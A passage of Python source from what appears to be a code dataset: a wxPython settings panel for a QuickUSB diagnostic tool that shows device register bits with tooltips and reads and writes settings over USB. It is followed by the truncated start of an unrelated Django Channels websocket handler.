self.btsPORTAH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTAH)\n\n self.btsPORTAL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTAL, label='IOA', name='btsPORTAL',\n parent=self.pSettings, pos=wx.Point(264, 184), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=9,\n tooltips=['Bit 0: PA[0] Value', 'Bit 1: PA[1] Value',\n 'Bit 2: PA[2] Value', 'Bit 3: PA[3] Value', 'Bit 4: PA[4] Value',\n 'Bit 5: PA[5] Value', 'Bit 6: PA[6] Value', 'Bit 7: PA[7] Value'],\n value=0)\n self.btsPORTAL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTAL)\n\n self.btsPORTCH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTCH, label='OEC', name='btsPORTCH',\n parent=self.pSettings, pos=wx.Point(4, 224), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=11,\n tooltips=['Bit 0: PC[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PC[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PC[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PC[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PC[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PC[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PC[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PC[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTCH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTCH)\n\n self.btsPORTEL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTEL, label='IOE', name='btsPORTEL',\n parent=self.pSettings, pos=wx.Point(264, 264), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=13,\n tooltips=['Bit 0: PE[0] Value', 'Bit 1: PE[1] Value',\n 'Bit 2: PE[2] Value', 'Bit 3: PE[3] Value', 'Bit 4: PE[4] Value',\n 'Bit 5: PE[5] Value', 'Bit 6: PE[6] Value', 'Bit 7: PE[7] Value'],\n value=0)\n self.btsPORTEL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTEL)\n\n self.btsPORTCL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTCL, label='IOC', name='btsPORTCL',\n parent=self.pSettings, pos=wx.Point(264, 224), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=11,\n tooltips=['Bit 0: PC[0] Value', 'Bit 1: PC[1] Value',\n 'Bit 2: PC[2] Value', 'Bit 3: PC[3] Value', 'Bit 4: PC[4] Value',\n 'Bit 5: PC[5] Value', 'Bit 6: PC[6] Value', 'Bit 7: PC[7] Value'],\n value=0)\n self.btsPORTCL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTCL)\n\n self.btsPORTEH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTEH, label='OEE', name='btsPORTEH',\n parent=self.pSettings, pos=wx.Point(4, 264), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=13,\n tooltips=['Bit 0: PE[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PE[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PE[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PE[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PE[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PE[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PE[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PE[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTEH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTEH)\n\n self.btsVERSIONSPEEDL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDL, label='VERSIONSPEED',\n name='btsVERSIONSPEEDL', parent=self.pSettings, pos=wx.Point(264,\n 344), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=17, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: USB Bus Speed\\n 0 - Full-Speed (12 Mbps)\\n 1 - High-Speed (480 Mbps)'],\n value=0)\n self.btsVERSIONSPEEDL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDL)\n self.btsVERSIONSPEEDL.SetMinSize((-1, -1))\n\n self.btsDATAADDRESSH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSDATAADDRESSH, label='DataAddress',\n name='btsDATAADDRESSH', parent=self.pSettings, pos=wx.Point(4,\n 44), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=2, tooltips=['Bit 0: GPIFADR[8]', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved',\n 'Bit 6: Disable Address Bus\\n 0 - Enable address bus\\n 1 - Disable address bus',\n \"Bit 7: Disable Auto-Increment of Address Bus\\n 0 - Auto-increment address bus\\n 1 - Don't auto-increment address bus\"],\n value=0)\n self.btsDATAADDRESSH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSDATAADDRESSH)\n\n self.btsVERSIONSPEEDH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDH, label='VERSIONSPEED',\n name='btsVERSIONSPEEDH', parent=self.pSettings, pos=wx.Point(4,\n 344), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=17,\n tooltips=['Bit 0: HARDWAREREV[0]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 1: HARDWAREREV[1]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 2: HARDWAREREV[2]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 3: HARDWAREREV[3]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 4: HARDWAREREV[4]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 5: HARDWAREREV[5]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 6: HARDWAREREV[6]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E',\n 'Bit 7: HARDWAREREV[7]\\n 00000000 - CYC68013 Rev A/B\\n 00000001 - CYC68013A Rev A\\n 00000010 - CYC68013 Rev C/D\\n 00000100 - CYC68013 Rev E'],\n value=0)\n self.btsVERSIONSPEEDH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONSPEEDH)\n self.btsVERSIONSPEEDH.SetMinSize((-1, -1))\n\n self.btsDATAADDRESSL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSDATAADDRESSL, label='DataAddress',\n name='btsDATAADDRESSL', parent=self.pSettings, pos=wx.Point(264,\n 44), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=2, tooltips=['Bit 0: GPIFADR[0] - GPIF Adddress Bit 0',\n 'Bit 1: GPIFADR[1] - GPIF Adddress Bit 1',\n 'Bit 2: GPIFADR[2] - GPIF Adddress Bit 2',\n 'Bit 3: GPIFADR[3] - GPIF Adddress Bit 3',\n 'Bit 4: GPIFADR[4] - GPIF Adddress Bit 4',\n 'Bit 5: GPIFADR[5] - GPIF Adddress Bit 5',\n 'Bit 6: GPIFADR[6] - GPIF Adddress Bit 6',\n 'Bit 7: GPIFADR[7] - GPIF Adddress Bit 7'], value=0)\n self.btsDATAADDRESSL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSDATAADDRESSL)\n\n self.btsFIFOCONFIGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGH, label='FifoPinPolar',\n name='btsFIFOCONFIGH', parent=self.pSettings, pos=wx.Point(4, 64),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=3,\n tooltips=['Bit 0: FF - FIFO Full Flag Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 1: EF - FIFO Empty Flag Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 2: SLWR - FIFO Write Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 3: SLRD - FIFO Read Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 4: SLOE - FIFO Output Enable Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 5: PKTEND - FIFO Packet End Polarity\\n 0 - Active low\\n 1 - Active high',\n 'Bit 6: Reserved', 'Bit 7: Reserved'], value=0)\n self.btsFIFOCONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGH)\n\n self.btsFIFOCONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGL, label='IFCONFIG',\n name='btsFIFOCONFIGL', parent=self.pSettings, pos=wx.Point(264,\n 64), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=3,\n tooltips=['Bit 0: IFCFG[0] - HSPP Configuration Bit 0\\n 00 - IO ports\\n 01 - Reserved\\n 10 - GPIF master mode\\n 11 - Slave FIFO mode',\n 'Bit 1: IFCFG[1] - HSPP Configuration Bit 1\\n 00 - IO ports\\n 01 - Reserved\\n 10 - GPIF master mode\\n 11 - Slave FIFO mode',\n 'Bit 2: Reserved',\n 'Bit 3: ASYNC - GPIF Clock Mode Select\\n 0 - Synchronous\\n 1 - Asynchronous',\n 'Bit 4: IFCLKPOL - IFCLK Polarity Select\\n 0 - Normal\\n 1 - Inverted',\n 'Bit 5: IFCLKOE - IFCLK Output Enable\\n 0 - Tri-state the IFCLK pin\\n 1 - Drive the IFCLK pin',\n 'Bit 6: 3048MHZ - IFCLK Speed Select\\n 0 - 30 MHz\\n 1 - 48 MHz',\n 'Bit 7: IFCLKSRC - IFCLK Source\\n 0 - External\\n 1 - Internal'],\n value=0)\n self.btsFIFOCONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFIFOCONFIGL)\n\n self.btsI2CTLH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSI2CTLH, label='I2CTL', name='btsI2CTLH',\n parent=self.pSettings, pos=wx.Point(4, 164), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=8,\n tooltips=['Bit 0: Last I2C Read Status Bit 0\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 1: Last I2C Read Status Bit 1\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 2: Last I2C Read Status Bit 2\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 3: Last I2C Read Status Bit 3\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 4: Last I2C Read Status Bit 4\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 5: Last I2C Read Status Bit 5\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 6: Last I2C Read Status Bit 6\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout',\n 'Bit 7: Last I2C Read Status Bit 7\\n 00000110 - Bus error\\n 00000111 - No ACK\\n 00001000 - Normal completion\\n 00001010 - Slave wait\\n 00001011 - Timeout'],\n value=0)\n self.btsI2CTLH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSI2CTLH)\n\n self.btsFPGATYPEL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFPGATYPEL, label='FPGATYPE',\n name='btsFPGATYPEL', parent=self.pSettings, pos=wx.Point(264, 84),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=4,\n tooltips=['Bit 0: FPGATYPE\\n 0 - Altera (Passive Serial)\\n 1 - Xilinx (Slave Serial)',\n 'Bit 1: Reserved', 'Bit 2: Reserved', 'Bit 3: Reserved',\n 'Bit 4: Reserved', 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: Reserved'], value=0)\n self.btsFPGATYPEL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFPGATYPEL)\n\n self.btsEP26CONFIGH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSEP26CONFIGH, label='EP2CFG',\n name='btsEP26CONFIGH', parent=self.pSettings, pos=wx.Point(4, 4),\n showlabel=True, size=wx.Size(206, 18), style=wx.NO_BORDER,\n tagint=0,\n tooltips=['Bit 0: EP2 Buffering[0]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 1: EP2 Buffering[1]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 2: Reserved',\n 'Bit 3: EP2 Buffer Size\\n 0 - 512 bytes\\n 1 - 1024 bytes',\n 'Bit 4: EP2 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 5: EP2 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 6: EP2 Direction\\n 0 - Output\\n 1 - Input',\n 'Bit 7: EP2 Valid\\n 0 - Not activated\\n 1 - Activated'],\n value=0)\n self.btsEP26CONFIGH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSEP26CONFIGH)\n\n self.btsVERSIONBUILDL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDL, label='VERSIONBUILD',\n name='btsVERSIONBUILDL', parent=self.pSettings, pos=wx.Point(264,\n 324), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=16, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsVERSIONBUILDL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDL)\n\n self.btsI2CTLL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSI2CTLL, label='I2CTL', name='btsI2CTLL',\n parent=self.pSettings, pos=wx.Point(264, 164), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=8,\n tooltips=['Bit 0: I2C Bus Clock Speed\\n 0 - Appoximately 100 kHz\\n 1 - Appoximately 400 kHz',\n 'Bit 1: Reserved', 'Bit 2: Reserved', 'Bit 3: Reserved',\n 'Bit 4: Reserved', 'Bit 5: Reserved', 'Bit 6: Reserved',\n 'Bit 7: IgnoreACK\\n 0 - Handle ACK for normal I2C traffic\\n 1 - Process I2C traffic regardless of ACK'],\n value=0)\n self.btsI2CTLL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSI2CTLL)\n\n self.btsFPGATYPEH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSFPGATYPEH, label='FPGATYPE',\n name='btsFPGATYPEH', parent=self.pSettings, pos=wx.Point(4, 84),\n showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=4, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsFPGATYPEH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSFPGATYPEH)\n\n self.btsEP26CONFIGL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSEP26CONFIGL, label='EP6CFG',\n name='btsEP26CONFIGL', parent=self.pSettings, pos=wx.Point(302,\n 4), showlabel=True, size=wx.Size(206, 18), style=wx.NO_BORDER,\n tagint=0,\n tooltips=['Bit 0: EP6 Buffering[0]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 1: EP6 Buffering[1]\\n 00 - Quad\\n 01 - Invalid\\n 10 - Double\\n 11 - Triple',\n 'Bit 2: Reserved',\n 'Bit 3: EP6 Buffer Size\\n 0 - 512 bytes\\n 1 - 1024 bytes',\n 'Bit 4: EP6 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 5: EP6 Type[0]\\n 00 - Invalid\\n 01 - Isochronous\\n 10 - Bulk\\n 11 - Interrupt',\n 'Bit 6: EP6 Direction\\n 0 - Output\\n 1 - Input',\n 'Bit 7: EP6 Valid\\n 0 - Not activated\\n 1 - Activated'],\n value=0)\n self.btsEP26CONFIGL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSEP26CONFIGL)\n\n self.btsVERSIONBUILDH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDH, label='VERSIONBUILD',\n name='btsVERSIONBUILDH', parent=self.pSettings, pos=wx.Point(4,\n 324), showlabel=True, size=wx.Size(244, 18), style=wx.NO_BORDER,\n tagint=16, tooltips=['Bit 0: Reserved', 'Bit 1: Reserved',\n 'Bit 2: Reserved', 'Bit 3: Reserved', 'Bit 4: Reserved',\n 'Bit 5: Reserved', 'Bit 6: Reserved', 'Bit 7: Reserved'],\n value=0)\n self.btsVERSIONBUILDH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSVERSIONBUILDH)\n\n self.btsPORTBL = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTBL, label='IOB', name='btsPORTBL',\n parent=self.pSettings, pos=wx.Point(264, 204), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=10,\n tooltips=['Bit 0: PB[0] Value', 'Bit 1: PB[1] Value',\n 'Bit 2: PB[2] Value', 'Bit 3: PB[3] Value', 'Bit 4: PB[4] Value',\n 'Bit 5: PB[5] Value', 'Bit 6: PB[6] Value', 'Bit 7: PB[7] Value'],\n value=0)\n self.btsPORTBL.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTBL)\n\n self.btsPORTBH = BitTwiddler(bits=8, bitspacing=4,\n id=wxID_PANELSETTINGSBTSPORTBH, label='OEB', name='btsPORTBH',\n parent=self.pSettings, pos=wx.Point(4, 204), showlabel=True,\n size=wx.Size(244, 18), style=wx.NO_BORDER, tagint=10,\n tooltips=['Bit 0: PB[0] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 1: PB[1] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 2: PB[2] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 3: PB[3] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 4: PB[4] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 5: PB[5] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 6: PB[6] Output Enable\\n 0 - Input\\n 1 - Output',\n 'Bit 7: PB[7] Output Enable\\n 0 - Input\\n 1 - Output'],\n value=0)\n self.btsPORTBH.Bind(wx.EVT_CHECKBOX, self.OnBtsCheckbox,\n id=wxID_PANELSETTINGSBTSPORTBH)\n\n self._init_sizers()\n\n def __init__(self, parent, id, pos, size, style, name):\n#-------------------------------------------------------------------------------\n self._init_ctrls(parent)\n \n # By default, this panel is used to access QuickUSB settings (instead of\n # defaults)\n self._useAsSettings = True\n\n\n\n def UseAsDefaults(self, defaults=True):\n \"\"\"\n Method to set the use of this panel to defaults instead of settings\n \"\"\"\n self._useAsSettings = not defaults\n self.sbSettings.SetLabel('Defaults')\n \n \n \n def SetControlMinSizes(self):\n \"\"\"\n This method sets the minimum size of all the BitTwiddler controls on the\n panel based on the size of the largest BitTwiddler. This ensures that\n all of the BT's line up correctly as they do not play nicely with sizers\n quite yet.\n \"\"\"\n wH, wL = 0, 0\n h = 0\n for settingH, settingL, setting in self.GetSettings():\n wsH, hsH = settingH.GetSize()\n wsL, hsL = settingL.GetSize()\n wH = max(wH, wsH)\n wL = max(wL, wsL)\n h = max(h, hsH, hsL)\n \n for settingH, settingL, setting in self.GetSettings():\n settingH.SetMinSize((wH, h))\n settingL.SetMinSize((wL, h))\n self.pSettings.Layout()\n \n \n \n def GetSettings(self):\n \"\"\"\n Return an iterable list of 3-element tuples of all the settings. The\n list has the form:\n [(BitTwiddlerObjH, BitTwiddlerObjL, QuickUsb.Setting), ...]\n \"\"\"\n settings = self.GetDefaults()\n settings.extend([(self.btsVERSIONBUILDH, self.btsVERSIONBUILDL, Setting.VersionBuild),\n (self.btsVERSIONSPEEDH, self.btsVERSIONSPEEDL, Setting.VersionSpeed)])\n return settings\n \n \n \n def GetDefaults(self):\n \"\"\"\n Return an iterable list of 3-element tuples of all the defaults. The\n list has the form:\n [(BitTwiddlerObjH, BitTwiddlerObjL, QuickUsb.Setting), ...]\n \"\"\"\n return [(self.btsEP26CONFIGH, self.btsEP26CONFIGL, Setting.Ep26Config), \n (self.btsWORDWIDEH, self.btsWORDWIDEL, Setting.WordWide),\n (self.btsDATAADDRESSH, self.btsDATAADDRESSL, Setting.DataAddress),\n (self.btsFIFOCONFIGH, self.btsFIFOCONFIGL, Setting.FifoConfig),\n (self.btsFPGATYPEH, self.btsFPGATYPEL, Setting.FpgaType),\n (self.btsCPUCONFIGH, self.btsCPUCONFIGL, Setting.CpuConfig),\n (self.btsSPICONFIGH, self.btsSPICONFIGL, Setting.SpiConfig),\n (self.btsSLAVEFIFOFLAGSH, self.btsSLAVEFIFOFLAGSL, Setting.SlaveFifoFlags),\n (self.btsI2CTLH, self.btsI2CTLL, Setting.I2Ctl),\n (self.btsPORTAH, self.btsPORTAL, Setting.PortA),\n (self.btsPORTBH, self.btsPORTBL, Setting.PortB),\n (self.btsPORTCH, self.btsPORTCL, Setting.PortC),\n (self.btsPORTDH, self.btsPORTDL, Setting.PortD),\n (self.btsPORTEH, self.btsPORTEL, Setting.PortE),\n (self.btsPORTACCFGH, self.btsPORTACCFGL, Setting.PortACCfg),\n (self.btsPINFLAGSH, self.btsPINFLAGSL, Setting.PinFlags)]\n \n \n \n def UpdateCtrlsEnable(self, ena):\n \"\"\"\n Called by frameMain when we need to update which controls are enabled \n and disabled\n \"\"\"\n self.btsVERSIONBUILDH.Enable(ena and self._useAsSettings)\n self.btsVERSIONBUILDL.Enable(ena and self._useAsSettings)\n \n self.btsVERSIONSPEEDH.Enable(ena and self._useAsSettings)\n self.btsVERSIONSPEEDL.Enable(ena and self._useAsSettings)\n\n self.btsSLAVEFIFOFLAGSH.Enable(ena and self._useAsSettings)\n self.btsSLAVEFIFOFLAGSL.Enable(ena and self._useAsSettings)\n \n \n \n def UpdateCtrls(self, qusb):\n \"\"\"\n Called by frameMain when we need to update the values within our \n controls\n \"\"\"\n if self._useAsSettings:\n self.TheFrame.SetStatus('Reading settings...')\n settings = self.GetSettings()\n else:\n self.TheFrame.SetStatus('Reading defaults...')\n settings = self.GetDefaults()\n \n # Iterate through all settings/defaults\n for valueCtrlH, valueCtrlL, setting in settings:\n if self._useAsSettings:\n # Read the setting\n (ok, value) = qusb.ReadSetting(setting)\n if not ok:\n self.TheFrame.SetStatus(\"ReadSetting() failed with error: \" + str(Error(qusb.LastError())))\n return\n else:\n # Read the default\n (ok, value) = qusb.ReadDefault(setting)\n if not ok:\n self.TheFrame.SetStatus(\"ReadSetting() failed with error: \" + str(Error(qusb.LastError())))\n return\n \n # Extract the MSB and LSB\n valueH = (value >> 8) & 0xff\n valueL = (value & 0xff)\n \n # Update the BitTwiddler controls\n valueCtrlH.SetValue(valueH)\n valueCtrlL.SetValue(valueL)\n \n \n \n \n def PeriodicUpdateCtrls(self, qusb):\n \"\"\"\n Called fy frameMain when we are to refresh our controls with values\n read off the QuickUSB Module\n \"\"\"\n if self._useAsSettings:\n self.UpdateCtrls(qusb)\n\n \n \n def LoadConf(self, conf):\n \"\"\"Called by frameMain when we are to load our configuration settings\"\"\"\n pass\n \n \n \n def SaveConf(self):\n \"\"\"Called by frameMain when we are to save our configuration settings\"\"\"\n return {}\n\n\n\n def OnBtsCheckbox(self, event):\n \"\"\"\n Event handler for all of the BitTwiddler controls\n \"\"\"\n # Ensure that a valid module is selected\n qusb = self.TheFrame.GetSelectedModule()\n if not qusb:\n return\n\n # The event object holds a reference to the actual BitTwiddler control\n # that was checked\n obj = event.GetEventObject()\n \n # The tag int holds the QuickUsb.Setting value for the BT, and the value\n # holds the new value of the BT object\n TagInt, Value = obj.GetTagInt(), obj.GetValue()\n \n # Locate the setting that was clicked\n if self._useAsSettings:\n settings = self.GetSettings()\n else:\n settings = self.GetDefaults()\n \n # Iterate over all settings/defaults to locate the BT that was clicked\n for valueCtrlH, valueCtrlL, setting in settings:\n # Check if this was our BT\n if (valueCtrlH is obj) or (valueCtrlL is obj):\n # Create the setting word from the MSB and LSB bytes\n valueH, valueL = valueCtrlH.GetValue(), valueCtrlL.GetValue()\n value = (valueH << 8) | valueL\n \n # Write the setting/default\n if self._useAsSettings:\n (ok,) = qusb.WriteSetting(setting, value)\n if not ok:\n self.TheFrame.SetStatus(\"WriteSetting() failed with error: \" + str(Error(qusb.LastError())))\n return\n else:\n (ok,) = qusb.WriteDefault(setting, value)\n if not ok:\n self.TheFrame.SetStatus(\"WriteDefault() failed with error: \" + str(Error(qusb.LastError())))\n return\n \n # If our global setting says we should perform reads after\n # writes\n if self.TheFrame._performReadBack:\n # Wait a little before reading back the setting to make sure\n # that is took\n time.sleep(0.01)\n \n # Read the setting back\n if self._useAsSettings:\n (ok, value) = qusb.ReadSetting(setting)\n if not ok:\n self.TheFrame.SetStatus(\"ReadSetting() failed with error: \" + str(Error(qusb.LastError())))\n return\n else:\n (ok, value) = qusb.ReadDefault(setting)\n if not ok:\n self.TheFrame.SetStatus(\"ReadDefault() failed with error: \" + str(Error(qusb.LastError())))\n return\n \n # Extract the MSB and LSB\n valueH = (value >> 8) & 0xff\n valueL = (value & 0xff)\n \n # Update the BitTwiddler controls\n valueCtrlH.SetValue(valueH)\n valueCtrlL.SetValue(valueL)\n \n break\n","sub_path":"Drivers/Linux/Installer_Files/Samples/Python/QuickUsbDiagPy/panelSettings.py","file_name":"panelSettings.py","file_ext":"py","file_size_in_byte":50229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"388405801","text":"from channels.sessions import channel_session\nfrom channels import Group\nfrom urllib.parse import urlparse, parse_qs\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\n\n@channel_session\ndef ws_connect(message):\n\tquery_parameters = parse_qs(message.content['query_string'])\n\tmachine_id = query_parameters['id'][0]\n\tGroup(machine_id).add(message.reply_channel)\n\tmessage.channel_session['id'] = machine_id\n\tmessage.reply_channel.send({'text': 'In ws_connect'})\n\n@channel_session\ndef ws_receive(message):\n\tprint(\"In ws_receive\")\n\tgroup = 